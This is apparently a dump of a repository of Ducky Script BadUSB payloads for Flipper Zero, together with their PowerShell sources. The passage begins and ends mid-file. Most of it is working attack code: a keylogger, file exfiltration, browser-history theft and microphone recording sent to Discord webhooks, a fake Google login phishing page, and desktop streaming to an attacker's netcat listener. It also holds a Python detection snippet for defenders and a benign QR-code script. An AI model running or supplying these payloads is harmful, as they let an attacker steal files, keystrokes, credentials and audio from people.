$fileExtensions) {$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse;foreach ($file in $files) {$fileSize = $file.Length;if($currentZipSize + $fileSize -gt $maxZipFileSize){$zipArchive.Dispose();$currentZipSize = 0;curl.exe -F file1=@"$zipFilePath" $hookurl;Remove-Item -Path $zipFilePath -Force;Sleep 1;$index++;$zipFilePath ="$env:temp/Loot$index.zip";$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')}$entryName = 
$file.FullName.Substring($folder.Length + 1);[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName);$currentZipSize += $fileSize}}}$zipArchive.Dispose();curl.exe -F file1=@"$zipFilePath" $hookurl;Remove-Item -Path $zipFilePath -Force;Write-Output "$env:COMPUTERNAME : Exfiltration Complete."}Exfiltrate;sleep 5;exit 15 | DELAY 500 16 | ENTER 17 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate Files to USB Drive.txt: -------------------------------------------------------------------------------- 1 | REM Title: Exfiltrate files to Removable Drive 2 | REM Author: @beigeworm 3 | REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive 4 | REM Target: Windows 10 and 11 5 | 6 | REM 1. Run this script. 7 | REM 2. Connect your USB drive 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Exec Bypass 15 | ENTER 16 | DELAY 4000 17 | STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = 
"$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit 18 | ENTER 19 | -------------------------------------------------------------------------------- /OSINT/Google Login Phish to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Fake Google Login to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to open a webview window with a phishing page that sends the results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM **YOU WILL NEED THIS HTML FILE TO EDIT AND CONVERT** (https://github.com/beigeworm/assets/blob/main/login.html) 7 | REM Please don't be a bum hole and use this to pwn people, it is meant as a proof of concept only. 8 | 9 | REM *SETUP* 10 | REM replace WEBHOOK_HERE with a webhook and encode all the html to base 64. (HTML CODE LINK ABOVE) 11 | REM then replace YOUR_BASE64_ENCODED_HTML_HERE with the base64 string. 12 | REM Base65 encoder - https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Base64-Encoder-Decoder-GUI.ps1 13 | 14 | REM some setup for dukie script 15 | DEFAULT_DELAY 100 16 | 17 | REM open powershell (remove -W Hidden to show the window). 
18 | GUI r 19 | DELAY 750 20 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 21 | CTRL-SHIFT ENTER 22 | DELAY 1500 23 | ALT y 24 | DELAY 5000 25 | 26 | STRING $encodedText = 'YOUR_BASE64_ENCODED_HTML_HERE' 27 | ENTER 28 | STRING $decodedBytes = [System.Convert]::FromBase64String($encodedText);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedBytes);$outputFile = "$env:temp\google.html";Set-Content -Path $outputFile -Value $decodedText -Encoding UTF8 29 | ENTER 30 | STRING$htmlFile = "$env:temp\google.html";$screen = [System.Windows.Forms.Screen]::PrimaryScreen;$screenWidth = $screen.WorkingArea.Width;$screenHeight = $screen.WorkingArea.Height;$left = ($screenWidth - $width) / 2;$top = ($screenHeight - $height) / 2;$chromePath = "C:\Program Files\Google\Chrome\Application\chrome.exe";$width = 530;$height = 600 31 | ENTER 32 | STRING $arguments = "--new-window --window-position=$left,$top --window-size=$width,$height --app=$htmlFile";$chromeProcess = Start-Process -FilePath $chromePath -ArgumentList $arguments -PassThru;$chromeProcess.WaitForExit() 33 | ENTER 34 | 35 | 36 | -------------------------------------------------------------------------------- /Netcat-Screenshare/main.ps1: -------------------------------------------------------------------------------- 1 | $IP = "$ip" 2 | $PORT = "9000" 3 | 4 | while ($true){ 5 | try{ 6 | Add-Type -AssemblyName System.Windows.Forms 7 | [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream 8 | $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) 9 | $socket.Connect($IP,$PORT) 10 | 11 | function SendResponse($sock, $string){ 12 | if ($sock.Connected){ 13 | $bytesSent = $sock.Send($string) 14 | if ( $bytesSent -eq -1 ){}}} 15 | 16 | function SendStrResponse($sock, $string){ 17 | if ($sock.Connected){ 18 | $bytesSent = $sock.Send( 19 | 
[text.Encoding]::Ascii.GetBytes($string)) 20 | if ( $bytesSent -eq -1 ){}}} 21 | 22 | function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){ 23 | $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" 24 | SendStrResponse $sock $response} 25 | SendHeader $socket 26 | 27 | while ($True){ 28 | $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) 29 | $g = [System.Drawing.Graphics]::FromImage($b) 30 | $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) 31 | $g.Dispose() 32 | $MemoryStream.SetLength(0) 33 | $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) 34 | $b.Dispose() 35 | $length = $MemoryStream.Length 36 | [byte[]] $Bytes = $MemoryStream.ToArray() 37 | $str = "`n`n--boundary`n" + 38 | "Content-Type: image/jpeg`n" + 39 | "Content-Length: $length`n`n" 40 | SendStrResponse $socket $str 41 | SendResponse $socket $Bytes 42 | } 43 | $MemoryStream.Close() 44 | }catch{Write-Error $_}} 45 | 46 | -------------------------------------------------------------------------------- /OSINT/Record-Mic-to-Discord.txt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Mic To Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: record a 60 second audio file from the microphone and send to discord. 4 | REM Target: Windows 10 5 | 6 | REM SETUP 7 | REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | 15 | REM open powershell (add "-W Hidden" to hide the window). 
16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordAudio{param ([int[]]$t);$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "http://beigenet.duckdns.org/files/Win10Tools/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;Add-Type '[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDevice {int a(); int o();int GetId([MarshalAs(UnmanagedType.LPWStr)] out string id);}[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDeviceEnumerator {int f();int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);}[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }public static string GetDefault (int direction) {var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;IMMDevice dev = null;Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(direction, 1, out dev));string id = null;Marshal.ThrowExceptionForHR(dev.GetId(out id));return id;}' -name audio -Namespace system;function getFriendlyName($id) {$reg = "HKLM:\SYSTEM\CurrentControlSet\Enum\SWD\MMDEVAPI\$id";return (get-ItemProperty $reg).FriendlyName};$id1 = [audio]::GetDefault(1);$MicName = "$(getFriendlyName $id1)"; Write-Output $MicName;$mp3Path = "$env:Temp\AudioClip.mp3";if ($t.Length -eq 0){$t = 10}.$env:Temp\ffmpeg.exe -f dshow -i audio="$MicName" -t $t -c:a libmp3lame -ar 44100 -b:a 128k -ac 1 $mp3Path;curl.exe -F file1=@"$mp3Path" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordAudio -t 60;exit 21 | ENTER -------------------------------------------------------------------------------- /Browser-History-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $whuri = "$dc" 3 | 4 | # shortened URL Detection 5 | if ($whuri.Ln -ne 121){Write-Host "Shortened 
Webhook URL Detected.." ; $whuri = (irm $whuri).url} 6 | 7 | $outpath = "$env:temp\history.txt" 8 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII 9 | 10 | # Define the Regular expression for extracting history and bookmarks 11 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 12 | 13 | # Define paths for data storage 14 | $Paths = @{ 15 | 'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 16 | 'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" 17 | 'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 18 | 'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks" 19 | 'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite" 20 | 'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History" 21 | 'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks" 22 | } 23 | 24 | # Define browsers and data 25 | $Browsers = @('chrome', 'edge', 'firefox', 'opera') 26 | $DataValues = @('history', 'bookmarks') 27 | 28 | foreach ($Browser in $Browsers) { 29 | foreach ($DataValue in $DataValues) { 30 | $PathKey = "${Browser}_${DataValue}" 31 | $Path = $Paths[$PathKey] 32 | 33 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique 34 | 35 | $Value | ForEach-Object { 36 | [PSCustomObject]@{ 37 | Browser = $Browser 38 | DataType = $DataValue 39 | Content = $_ 40 | } 41 | } | Out-File -FilePath $outpath -Append 42 | } 43 | } 44 | 45 | curl.exe -F file1=@"$outPath" $whuri | Out-Null 46 | sleep 2 47 | Remove-Item -Path $outPath -force 48 | -------------------------------------------------------------------------------- /OSINT/Keylogger to Discord.txt: 
-------------------------------------------------------------------------------- 1 | REM Title: Keylogger to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to gather keystroke info and send it via Discord. 4 | REM Target: Windows 10 5 | REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys 6 | 7 | REM *SETUP* 8 | REM replace WEBHOOK_GOES_HERE with your discord webhook. 9 | 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM Open Powershell and start logs. 15 | DELAY 1000 16 | GUI r 17 | DELAY 500 18 | STRING powershell -NoP -NonI -Exec Bypass -W hidden 19 | ENTER 20 | DELAY 5000 21 | STRING $dc = "WEBHOOK_GOES_HERE!";$a = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$a = Add-Type -MemberDefinition $a -Name 'Win32' -Namespace API -PassThru;$b = [System.Diagnostics.Stopwatch]::StartNew();$c = [TimeSpan]::FromSeconds(10);While($true){$d = $false;try{while ($b.Elapsed -lt $c){Sleep -Milliseconds 30;for($e = 8; $e -le 254; $e++){$f = $a::GetAsyncKeyState($e);if ($f -eq -32767){$d = $true;$b.Restart();$null = [console]::CapsLock;$g = $a::MapVirtualKey($e, 3);$h = New-Object Byte[] 256;$j = $a::GetKeyboardState($h);$k = New-Object -TypeName System.Text.StringBuilder;if($a::ToUnicode($e, $g, $h, $k, $k.Capacity, 0)){;$l = $k.ToString();if ($e -eq 8) {$l = "[BKSP]"};if ($e -eq 13) {$l = "[ENT]"};if ($e -eq 27) {$l = "[ESC]"};$m += $l}}}}}finally{If($d){$n = $m -replace '[&<>]', 
{$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')};$o = Get-Date -Format "dd-MM-yyyy HH:mm:ss";$p = $o+" : "+'`'+$n+'`';$q = @{"username" = "$env:COMPUTERNAME" ;"content" = $p} | ConvertTo-Json;irm -Uri $dc -Method Post -ContentType "application/json" -Body $q;$d = $false;$m = ""}}$b.Restart();Sleep -Milliseconds 10} 22 | ENTER 23 | -------------------------------------------------------------------------------- /Exfiltrate-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | 3 | $hookurl = "$dc" 4 | # shortened URL Detection 5 | if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url} 6 | 7 | Function Exfiltrate { 8 | 9 | param ([string[]]$FileType,[string[]]$Path) 10 | $maxZipFileSize = 25MB 11 | $currentZipSize = 0 12 | $index = 1 13 | $zipFilePath ="$env:temp/Loot$index.zip" 14 | 15 | If($Path -ne $null){ 16 | $foldersToSearch = "$env:USERPROFILE\"+$Path 17 | }else{ 18 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 19 | } 20 | 21 | If($FileType -ne $null){ 22 | $fileExtensions = "*."+$FileType 23 | }else { 24 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 25 | } 26 | 27 | Add-Type -AssemblyName System.IO.Compression.FileSystem 28 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 29 | 30 | foreach ($folder in $foldersToSearch) { 31 | foreach ($extension in $fileExtensions) { 32 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 33 | foreach ($file in $files) { 34 | $fileSize = $file.Length 35 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 36 | $zipArchive.Dispose() 37 | $currentZipSize = 0 38 | 
curl.exe -F file1=@"$zipFilePath" $hookurl 39 | Remove-Item -Path $zipFilePath -Force 40 | Sleep 1 41 | $index++ 42 | $zipFilePath ="$env:temp/Loot$index.zip" 43 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 44 | } 45 | $entryName = $file.FullName.Substring($folder.Length + 1) 46 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 47 | $currentZipSize += $fileSize 48 | } 49 | } 50 | } 51 | $zipArchive.Dispose() 52 | curl.exe -F file1=@"$zipFilePath" $hookurl 53 | Remove-Item -Path $zipFilePath -Force 54 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 55 | } 56 | 57 | Exfiltrate 58 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Script-For-FlipperZero 2 | This repository is a collection of scripts which have been updated specifically for the BadUSB/BadKB function on FlipperZero. 3 | They should, however, work just fine on any device that uses Ducky Script. 4 | These scripts range from harmless pranks to nefarious red team tools. For educational purposes only! 5 | 6 | **These payloads are all for Windows systems** 7 | 8 | **If you want to learn more about the code, most of these scripts are in powershell format here** 9 | 10 | https://github.com/beigeworm/Powershell-Tools-and-Toys - Repository of 50+ powershell scripts. 11 | 12 | https://github.com/beigeworm/PoshGram-C2 - A Telegram C2 client in powershell. 13 | 14 | https://github.com/beigeworm/PoshCord-C2 - A Discord C2 client in powershell. 15 | 16 | # Pre-Deployment Setup 17 | Most of these scripts will require some setup before they will work. 18 | Make sure to read through all the scripts and follow any setup instructions. 19 | 20 | **Setup for Telegram, Discord, Dropbox** 21 | 22 | **DROPBOX ACCESS TOKEN SETUP** 23 | 1. 
make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 24 | 2. generate an access token for your app. 25 | (Dropbox access tokens expire after 7 days.) 26 | 27 | **DISCORD WEBHOOK SETUP** 28 | 1. (Server Admin Required) On a discord server chat go to > "edit channel" > "integrations" > "webhooks" 29 | 2. make a new webhook, name it and then click "copy webhook URL". 30 | 31 | **TELEGRAM TOKEN SETUP** 32 | 1. Install Telegram and make an account if you haven't already. 33 | 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 34 | 3. Click the provided link to open the chat (e.g. "t.me/****bot"), then type or click /start. 35 | 4. Visit https://github.com/beigeworm/Powershell-Tools-and-Toys/tree/main/Command-and-Control for more info 36 | ---------------------------------------------------------------------------------------------------------------------------------------------------- 37 | 38 | # Notes 39 | 40 | Further setup instructions are within each payload file (if applicable). 41 | 42 | **You Should ALWAYS Read Any Scripts BEFORE running them** 43 | 44 | Fast-Execution-Scripts and GUI-Tools are pulled from github and staged using the 'Invoke-Expression' command. 45 | 46 | Most other scripts were designed to avoid downloading external scripts or programs. 47 | -------------------------------------------------------------------------------- /Console-QRcode/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# ======================== CONSOLE QR CODE GENERATOR ================================== 3 | 4 | SYNOPSIS 5 | Use 'chart.googleapis.com' to create a qrcode then represent the qrcode in the console! 6 | 7 | USAGE 8 | 1. Run script 9 | 2. Enter text or url to generate 10 | 3. Choose invert colors or not 11 | 4. 
Check console for results 12 | #> 13 | 14 | $URL = "$text" 15 | $highC = 'y' 16 | $inverse = 'n' 17 | 18 | Add-Type -AssemblyName System.Windows.Forms 19 | Add-Type -AssemblyName System.Drawing 20 | [Console]::BackgroundColor = "Black" 21 | 22 | $wshell = New-Object -ComObject wscript.shell 23 | $wshell.AppActivate("Powershell.exe") 24 | $wshell.SendKeys("{F11}") 25 | 26 | cls 27 | 28 | function Generate-QRCodeURL { 29 | param ([string]$URL,[int]$sizePercentage = 50) 30 | $EncodedURL = [uri]::EscapeDataString($URL) 31 | $newSize = [math]::Round((300 * $sizePercentage) / 100) 32 | $QRCodeURL = "https://chart.googleapis.com/chart?chs=${newSize}x${newSize}&cht=qr&chl=$EncodedURL" 33 | return $QRCodeURL 34 | } 35 | 36 | $QRCodeURL = Generate-QRCodeURL -URL $URL 37 | 38 | function Download-QRCodeImage { 39 | param ([string]$QRCodeURL) 40 | $TempFile = [System.IO.Path]::GetTempFileName() + ".png" 41 | Invoke-WebRequest -Uri $QRCodeURL -OutFile $TempFile 42 | return $TempFile 43 | } 44 | 45 | $QRCodeURL = Generate-QRCodeURL -URL $URL 46 | $QRCodeImageFile = Download-QRCodeImage -QRCodeURL $QRCodeURL 47 | $QRCodeImage = [System.Drawing.Image]::FromFile($QRCodeImageFile) 48 | $Bitmap = New-Object System.Drawing.Bitmap($QRCodeImage) 49 | 50 | if (($highC -eq 'n') -and ($inverse -eq 'y')){ 51 | $Chars = @('░', '█') 52 | } 53 | elseif (($highC -eq 'n') -and ($inverse -eq 'n')){ 54 | $Chars = @('█', '░') 55 | } 56 | 57 | if (($highC -eq 'y') -and ($inverse -eq 'y')){ 58 | $Chars = @(' ', '█') 59 | } 60 | elseif (($highC -eq 'y') -and ($inverse -eq 'n')){ 61 | $Chars = @('█', ' ') 62 | } 63 | 64 | for ($y = 0; $y -lt $Bitmap.Height; $y += 2) { 65 | for ($x = 0; $x -lt $Bitmap.Width; $x++) { 66 | $Index = if ($Bitmap.GetPixel($x, $y).ToArgb() -eq -16777216) { 1 } else { 0 } # Check if the pixel is black or white 67 | Write-Host -NoNewline $Chars[$Index] 68 | } 69 | Write-Host 70 | } 71 | 72 | $QRCodeImage.Dispose() 73 | Remove-Item -Path $QRCodeImageFile -Force 74 | pause 
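For defenders: the payloads in this repository share one launch pattern, a PowerShell started from the Run dialog with `-Exec Bypass` (often `-W Hidden`), followed in several cases by `curl.exe -F` uploads to a chat or storage API. The triage below is an added example, not code from this repository; the event dicts mimic Sysmon Event ID 1 fields and are constructed, and the rule names, minimum flag prefixes and the Discord URL pattern are assumptions of the example.

```python
import re

# powershell.exe accepts any unambiguous prefix of a parameter name, so "-W" and
# "-WindowStyle" are one switch. Minimum prefixes and the "ep" alias are assumptions.
PARAMS = {
    "noprofile": ("nop", ()),
    "noninteractive": ("noni", ()),
    "windowstyle": ("w", ()),
    "executionpolicy": ("ex", ("ep",)),
}
SHELLS = ("powershell.exe", "pwsh.exe")

# Upload endpoints the payloads on this page post to. The Discord pattern is the
# public webhook URL form (assumption; the page only shows a placeholder).
EXFIL_HOSTS = re.compile(
    r"discord(?:app)?\.com/api/webhooks|api\.telegram\.org/bot|content\.dropboxapi\.com",
    re.IGNORECASE,
)
FORM_UPLOAD = re.compile(r"(?:^|\s)(?:-F|--form)\s+\S*=@")  # curl multipart file upload

def canonical_flag(token):
    """Map '-W', '-Exec', '/nop', '-ep' ... to a full parameter name, else None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    name = token[1:].lower()
    for full, (min_prefix, aliases) in PARAMS.items():
        if name in aliases:
            return full
        if full.startswith(name) and len(name) >= len(min_prefix):
            return full
    return None

def starts_payload(token):
    """True for -Command / -File / -EncodedCommand (any prefix, or -ec)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or any(
        p.startswith(name) for p in ("command", "file", "encodedcommand"))

def parse_flags(command_line):
    """Return {parameter: value or True} for tracked switches before the payload."""
    tokens = [t.strip("\"'") for t in command_line.split()]
    flags = {}
    for i, tok in enumerate(tokens):
        full = canonical_flag(tok)
        if full is None:
            if starts_payload(tok):
                break  # anything after -Command/-File is script text, not switches
            continue
        if full in ("windowstyle", "executionpolicy"):
            flags[full] = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        else:
            flags[full] = True
    return flags

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def triage(event):
    """Return the names of the rules a Sysmon EID 1-style event trips."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd, hits = event["CommandLine"], []
    if image in SHELLS:
        flags = parse_flags(cmd)
        bypass = flags.get("executionpolicy") == "bypass"
        if bypass and flags.get("windowstyle") == "hidden":
            hits.append("hidden_bypass_shell")
        if bypass and parent == "explorer.exe":  # Run dialog spawns from explorer
            hits.append("run_dialog_bypass_shell")
    if image == "curl.exe" and parent in SHELLS:
        if FORM_UPLOAD.search(cmd) and EXFIL_HOSTS.search(cmd):
            hits.append("form_upload_to_chat_api")
    return hits

def scan(events):
    """Return [(index, [rule, ...])] for every event that trips a rule."""
    results = [(i, triage(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -NoP -NonI -W Hidden -Exec Bypass"},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell.exe -nop -WindowStyle hidden -ep bypass"},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -NoP -Exec Bypass"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": PS,
     "CommandLine": r'curl.exe -F file1=@"C:\Users\alice\AppData\Local\Temp\Loot1.zip" '
                    "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned "
                    r"-File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"][:60], "->", ", ".join(hits))
```

Because these payloads type their script into the already-running shell, the process command line carries only the switches; pair this with PowerShell Script Block Logging to see the script text itself.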
-------------------------------------------------------------------------------- /OSINT/Desktop Screenshare over Netcat.txt: -------------------------------------------------------------------------------- 1 | REM Title: Beigeworm's Desktop Screenshare Through Netcat 2 | REM Author: @beigeworm 3 | REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace YOUR_IP_HERE with your netcat attacker IP Address. 8 | REM Run script on target Windows system. 9 | REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) 10 | REM Then in a firefox browser (ONLY) on the Linux box > http://localhost:8080 11 | 12 | REM some setup for dukie script 13 | DEFAULT_DELAY 100 14 | 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 18 | ENTER 19 | DELAY 4000 20 | STRING $IP = "YOUR_IP_ADDRESS_OR_DOMAIN";$PORT = "9000";while($true){try{Add-Type -AssemblyName System.Windows.Forms;[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream;$socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp);$socket.Connect($IP,$PORT);function SendResponse($sock, $string){if($sock.Connected){$bytesSent = $sock.Send($string);if( $bytesSent -eq -1 ){}}};function SendStrResponse($sock, $string){if($sock.Connected){$bytesSent = $sock.Send([text.Encoding]::Ascii.GetBytes($string));if( $bytesSent -eq -1 ){}}};function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){$response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n";SendStrResponse $sock $response}SendHeader $socket;while ($True){$b = New-Object 
System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$g = [System.Drawing.Graphics]::FromImage($b);$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size);$g.Dispose();$MemoryStream.SetLength(0);$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg));$b.Dispose();$length = $MemoryStream.Length;[byte[]] $Bytes = $MemoryStream.ToArray();$str = "`n`n--boundary`n" + "Content-Type: image/jpeg`n" + "Content-Length: $length`n`n";SendStrResponse $socket $str;SendResponse $socket $Bytes}$MemoryStream.Close()}catch{Write-Error $_}};exit 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /Pranks/Hydra-in-Powershell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hydra In Powershell 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to display a popup that if closed, opens 2 more identical windows, thus soon creating many popups! 
